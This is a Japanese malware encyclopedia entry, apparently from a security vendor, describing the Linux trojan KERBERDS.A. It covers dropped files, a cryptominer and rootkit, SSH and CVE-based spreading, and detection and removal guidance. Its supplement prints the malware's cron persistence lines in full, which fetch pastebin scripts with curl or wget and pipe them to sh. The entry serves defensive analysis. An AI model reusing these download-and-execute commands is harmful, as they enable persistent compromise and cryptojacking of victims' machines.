Trojan.Linux.KERBERDS.A

2019年5月7日

解析者: Warren Adam Sto. Tomas

別名:

Trojan.Linux.Coinminer (Ikarus)

プラットフォーム:

Linux

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ: トロイの木馬型
破壊活動の有無: なし
暗号化: はい
感染報告の有無: はい

概要

感染経路インターネットからのダウンロード

トレンドマイクロは、このマルウェアをNoteworthy（要注意）に分類しました。

「Kerberods」は仮想通貨発掘マルウェア「khugepageds」（「Coinminer.Linux.MALXMR.UWEJI」として検出）とそのルートキットコンポーネントを作成します。また、Kerberodsは複数の拡散手法を持っています。1つはSSHを介した方法、もう1つは脆弱性「CVE-2019-1003000」および「CVE-2019-1003001」を利用する方法です。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 2900788 bytes

タイプ ELF

メモリ常駐はい

発見日 2019年4月25日

ペイロード URLまたはIPアドレスに接続, ファイルの作成

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。

/usr/local/bin/kerberods
/usr/libexec/tmp/kerberods
/usr/bin/kerberods
/tmp/kerberods

マルウェアは、以下のファイルを作成します。

/usr/local/lib/{random}.c (source code of rootkit)
/tmp/khugepageds - detected as Coinminer.Linux.MALXMR.UWEJI
/usr/local/lib/{random}.so (compiled executable of the source code) - detected as Rootkit.Linux.KERBERDS.A

マルウェアは、以下のプロセスを追加します。

/tmp/khugepageds
/usr/local/lib/{random}.so

他のシステム変更

マルウェアは、以下のファイルを改変します。

/etc/hosts

マルウェアは、以下のファイルを削除します。

/usr/local/bin/kerberods
/usr/libexec/tmp/kerberods
/usr/bin/kerberods
/tmp/kerberods
/etc/ld.so.preload

その他

マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。

https://ident.me

<補足>
インストール

マルウェアは、以下のファイルを作成します。

/usr/local/lib/{ランダム}.c (ルートキットのソースコード)
/tmp/khugepageds - Coinminer.Linux.MALXMR.UWEJIとして検出
/usr/local/lib/{ランダム}.so (コンパイルされたソースコードの実行ファイル) - Rootkit.Linux.KERBERDS.Aとして検出

その他

マルウェアは、以下を実行します。

マルウェアは、自身の自動実行を可能にするために以下のサービスを作成します。
- /etc/init.d/netdns
- /usr/lib/systemd/system/netdns.service
以下のcronジョブを作成して、10分ごとにpastebinにあるシェルスクリプトの自動実行を可能にします。
- Path: /etc/cron.d/root
- Content: */10 * * * * root (curl -fsSL https://pastebin.com/raw/{pastebinからの文字列}||wget -q -O- https://pastebin.com/raw/{pastebinからの文字列})|sh
以下のcronジョブを作成して、15分ごとにpastebinにあるシェルスクリプトの自動実行を可能にします。
- Paths:
  - /var/spool/cron/root
  - /var/spool/cron/crontabs/root
- Content: */15 * * * * (curl -fsSL https://pastebin.com/raw/{pastebinからの文字列}||wget -q -O- https://pastebin.com/raw/{pastebinからの文字列})|sh
マルウェアは、以下の脆弱性を悪用することにより、他のデバイスに拡散する可能性があります。
- CVE-2019-1003000
- CVE-2019-1003001
- SSHネットワークを介して
マルウェアは、以下のURLに接続します。
- https://pastebin.com/raw/{BLOCKED}1u (作成されたcronジョブのpastebin URLに追加される文字列を含みます)
- https://pastebin.com/raw/{BLOCKED}6H (更新を確認)
- https://pastebin.com/raw/{BLOCKED}iX (情報公開日現在のcronジョブ内の完全なURL)
- https://pastebin.com/raw/{BLOCKED}cb (脆弱なデバイス内にダウンロードされ実行されるシェルスクリプト)
以下のプロセスを終了します。
- "khugepageds"と名付けられたプロセス
- CPU使用率が80％以上のプロセス
コンピュータ内にGCCをインストールして、ルートキットのソースコードをコンパイルしてから実行します。
マルウェアは不正利用するためにRedisサーバへのアクセスを試みます。

対応方法

対応検索エンジン: 9.850

初回 VSAPI パターンバージョン 14.970.05

初回 VSAPI パターンリリース日 2019年4月25日

VSAPI OPR パターンバージョン 14.971.00

VSAPI OPR パターンリリース日 2019年4月26日

最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Linux.KERBERDS.A」と検出したファイルはすべて削除してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください